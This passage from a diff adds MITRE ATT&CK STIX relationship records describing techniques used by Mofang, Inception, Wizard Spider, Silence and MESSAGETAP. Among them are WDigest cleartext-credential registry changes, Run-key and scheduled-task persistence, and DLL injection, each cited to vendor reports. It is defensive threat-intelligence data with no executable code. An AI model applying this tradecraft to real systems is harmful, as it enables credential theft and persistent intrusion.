+ "description": "[Mofang](https://attack.mitre.org/groups/G0103)'s malicious spearphishing attachments required a user to open the file after receiving.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--b91c4f2d-8f21-46e9-a012-967436018eea",
+ "type": "relationship",
+ "modified": "2020-05-12T22:05:50.740Z",
+ "created": "2020-05-12T22:05:50.740Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--88489675-d216-4884-a98f-49a89fcc1643",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Mofang](https://attack.mitre.org/groups/G0103) delivered spearphishing emails with malicious documents, PDFs, or Excel files attached.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--7b4af425-27a6-4330-85e2-d8d03911d923",
+ "type": "relationship",
+ "modified": "2020-05-12T22:05:50.745Z",
+ "created": "2020-05-12T22:05:50.745Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--88489675-d216-4884-a98f-49a89fcc1643",
+ "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Mofang](https://attack.mitre.org/groups/G0103)'s spearphishing emails required a user to click the link to connect to a compromised website.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--78a49769-fec0-4961-a25d-fc5eab623e93",
+ "type": "relationship",
+ "modified": "2020-05-12T22:05:50.747Z",
+ "created": "2020-05-12T22:05:50.747Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--88489675-d216-4884-a98f-49a89fcc1643",
+ "target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Mofang](https://attack.mitre.org/groups/G0103) delivered spearphishing emails with malicious links included.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--0f29f072-1eb1-4711-8679-19580f16b351",
+ "type": "relationship",
+ "modified": "2020-05-12T22:05:50.811Z",
+ "created": "2020-05-12T22:05:50.811Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--88489675-d216-4884-a98f-49a89fcc1643",
+ "target_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "relationship_type": "uses",
+ "id": "relationship--69aa300b-3e31-438c-99bf-4822141046c5",
+ "type": "relationship",
+ "modified": "2020-05-15T15:36:36.960Z",
+ "created": "2020-05-12T22:05:50.826Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--88489675-d216-4884-a98f-49a89fcc1643",
+ "target_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "relationship_type": "uses",
+ "id": "relationship--6f82d8a7-d168-4e19-97d2-3950f0c649ce",
+ "type": "relationship",
+ "modified": "2020-05-15T15:36:36.961Z",
+ "created": "2020-05-12T22:05:50.828Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--9b19d6b4-cfcb-492f-8ca8-8449e7331573",
+ "target_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c",
+ "external_references": [
+ {
+ "source_name": "FireEye MESSAGETAP October 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html",
+ "description": "Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who\u2019s Reading Your Text Messages?. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[MESSAGETAP](https://attack.mitre.org/software/S0443) stored targeted SMS messages that matched its target list in CSV files on the compromised system.(Citation: FireEye MESSAGETAP October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--aa12e2a6-02e7-4001-af7b-6a60021ddbfd",
+ "type": "relationship",
+ "modified": "2020-06-24T01:43:11.352Z",
+ "created": "2020-05-12T22:21:54.139Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "external_references": [
+ {
+ "source_name": "Symantec Inception Framework March 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies",
+ "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has enumerated installed software on compromised systems.(Citation: Symantec Inception Framework March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--3c9c3d3d-a209-43dc-ae8d-53cd4c1de65c",
+ "type": "relationship",
+ "modified": "2020-05-12T22:22:08.596Z",
+ "created": "2020-05-12T22:22:08.596Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has modified the Registry key HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest by setting the UseLogonCredential registry value to 1 in order to force credentials to be stored in clear text in memory.(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--75f0ea4c-5b88-4b14-9859-67379f4ba9b0",
+ "type": "relationship",
+ "modified": "2020-05-13T12:42:06.757Z",
+ "created": "2020-05-13T12:42:06.757Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has lured victims to execute malware with spearphishing attachments containing macros to download either [Emotet](https://attack.mitre.org/software/S0367), Bokbot, or [TrickBot](https://attack.mitre.org/software/S0266).(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--53e1bf2f-7ab4-4173-879b-9975618c4527",
+ "type": "relationship",
+ "modified": "2020-05-13T12:42:06.786Z",
+ "created": "2020-05-13T12:42:06.786Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used scheduled tasks to install [TrickBot](https://attack.mitre.org/software/S0266), using task names to appear legitimate such as WinDotNet, GoogleTask, or Sysnetsf.(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7e555910-0e1b-403d-a369-e7a2e8e61670",
+ "type": "relationship",
+ "modified": "2020-05-15T18:52:17.528Z",
+ "created": "2020-05-13T13:20:59.322Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used scheduled tasks establish persistence for [TrickBot](https://attack.mitre.org/software/S0266).(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--57f8c6d0-406d-4e97-b3ff-5b2f0274231b",
+ "type": "relationship",
+ "modified": "2020-05-15T18:52:17.537Z",
+ "created": "2020-05-13T13:20:59.339Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used macros to execute PowerShell scripts to download malware on victims machines.(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--73baa214-fbe6-477e-9beb-d1a08a6d117f",
+ "type": "relationship",
+ "modified": "2020-05-13T13:20:59.343Z",
+ "created": "2020-05-13T13:20:59.343Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used a module named NewBCtestnDll64 as a reverse SOCKS proxy.(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f8a48d68-8557-4e17-a04b-9226efd4f4ef",
+ "type": "relationship",
+ "modified": "2020-05-15T18:52:17.578Z",
+ "created": "2020-05-13T13:20:59.374Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used file deletion to remove some modules and configurations from an infected host after use.(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5c252868-1474-4fed-b3b2-07a6d3415034",
+ "type": "relationship",
+ "modified": "2020-05-13T13:58:12.424Z",
+ "created": "2020-05-13T13:58:12.424Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has installed [TrickBot](https://attack.mitre.org/software/S0266) as a service named ControlServiceA in order to establish persistence.(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2b5965fe-b178-4c03-91af-942491c79302",
+ "type": "relationship",
+ "modified": "2020-05-13T13:58:12.493Z",
+ "created": "2020-05-13T13:58:12.493Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used stolen credentials to copy tools into the %TEMP% directory of domain controllers.(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--4f243ab6-812f-4fd3-9607-8d94409a94c1",
+ "type": "relationship",
+ "modified": "2020-05-15T18:52:17.533Z",
+ "created": "2020-05-13T15:28:06.633Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used RDP for lateral movement.(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--43fabcba-66b6-45dc-b905-926f0a0a2bba",
+ "type": "relationship",
+ "modified": "2020-05-15T18:52:17.580Z",
+ "created": "2020-05-13T15:28:06.685Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has exfiltrated domain credentials and network enumeration information over command and control (C2) channels.(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c51d9123-7f7e-41e6-8cf7-7c7dc4170ca0",
+ "type": "relationship",
+ "modified": "2020-05-15T18:52:17.609Z",
+ "created": "2020-05-13T16:45:50.311Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used HTTP for network communications.(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--93cd9a2c-48e3-4a95-90fb-6436afcfa7a8",
+ "type": "relationship",
+ "modified": "2020-05-13T16:45:50.316Z",
+ "created": "2020-05-13T16:45:50.316Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has collected and staged credentials and network enumeration information, using the networkdll and psfin [TrickBot](https://attack.mitre.org/software/S0266) modules.(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2c54816e-5dd1-4723-99f5-29c80a2fc171",
+ "type": "relationship",
+ "modified": "2020-05-13T16:45:50.317Z",
+ "created": "2020-05-13T16:45:50.317Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "FireEye Ryuk and Trickbot January 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
+ "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) used base64 encoding to obfuscate an [Empire](https://attack.mitre.org/software/S0363) service.(Citation: FireEye Ryuk and Trickbot January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5a2c4561-48e4-4d51-8f00-ff470a18df32",
+ "type": "relationship",
+ "modified": "2020-05-15T18:52:17.642Z",
+ "created": "2020-05-13T17:16:11.074Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
+ "external_references": [
+ {
+ "source_name": "FireEye Ryuk and Trickbot January 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
+ "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020."
+ },
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used networkdll for network discovery and psfin specifically for financial and point of sale indicators. [Wizard Spider](https://attack.mitre.org/groups/G0102) has also used AdFind.exe to enumerate domain computers, including the domain controller.(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--df13cae2-4e20-4e89-ae60-6bd8b99e2342",
+ "type": "relationship",
+ "modified": "2020-05-18T21:26:08.307Z",
+ "created": "2020-05-13T17:16:11.123Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used valid credentials for privileged accounts with the goal of accessing domain controllers.(Citation: CrowdStrike Grim Spider May 2019) ",
+ "relationship_type": "uses",
+ "id": "relationship--ad06b85a-a0df-41aa-8f45-f41504987918",
+ "type": "relationship",
+ "modified": "2020-05-15T18:52:17.644Z",
+ "created": "2020-05-13T17:16:11.136Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has used HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run, HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run, and the Startup folder to establish persistence.(Citation: Group IB Silence Sept 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--2d49852d-083e-4379-90e3-dcb0748be624",
+ "type": "relationship",
+ "modified": "2020-05-13T19:06:23.890Z",
+ "created": "2020-05-13T19:06:23.890Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has injected a DLL library containing a Trojan into the fwmain32.exe process.(Citation: Group IB Silence Sept 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--28a76700-4834-4a1b-bb56-2005bc044e29",
+ "type": "relationship",
+ "modified": "2020-05-13T19:06:23.909Z",
+ "created": "2020-05-13T19:06:23.909Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has used RAdmin, a remote software tool used to remotely control workstations and ATMs.(Citation: Group IB Silence Sept 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--6fc128ed-90f3-4933-8ad7-4fd4a04cb39f",
+ "type": "relationship",
+ "modified": "2020-05-13T19:06:23.916Z",
+ "created": "2020-05-13T19:06:23.916Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
